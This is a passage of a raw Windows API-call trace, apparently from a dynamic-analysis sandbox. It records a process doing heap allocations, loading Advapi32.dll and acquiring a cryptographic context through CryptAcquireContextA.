HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0230.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0230.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0230.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0230.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0230.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.254] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0230.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0230.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0230.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0230.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0230.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0230.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0230.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.254] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0230.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.255] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04038 [0230.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0230.255] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0230.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04038 | out: hHeap=0x970000) returned 1 [0230.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0230.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0230.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0230.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0230.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0230.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0230.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0230.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0230.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0230.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0230.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0230.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0230.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0230.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0230.255] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0230.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0230.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0230.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0230.255] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0230.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0230.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0230.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0230.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0230.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0230.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0230.256] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0230.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0230.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0230.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0230.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0230.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0230.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0230.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0230.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0230.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0230.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0230.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0230.256] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0230.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0230.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0230.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0230.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0230.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0230.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0230.257] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0230.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0230.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0230.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0230.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0230.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.257] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.257] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0230.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0230.258] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0230.258] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0230.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0230.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0230.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0230.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e699c8 [0230.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e699c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0230.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0230.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0230.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0230.259] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0230.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0230.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0230.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0230.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0230.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0230.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0230.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0230.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0230.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0230.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0230.259] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0230.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0230.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0230.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0230.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0230.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0230.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0230.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0230.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0230.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0230.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0230.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0230.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0230.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0230.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0230.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0230.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0230.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0230.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0230.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0230.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0230.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0230.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0230.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0230.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0230.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0230.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0230.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0230.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0230.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0230.263] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0230.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0230.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0230.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0230.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0230.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0230.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0230.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0230.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0230.263] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0230.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0230.263] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0230.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0230.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0230.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0230.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0230.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0230.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0230.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0230.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0230.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0230.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0230.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0230.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0230.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0230.264] 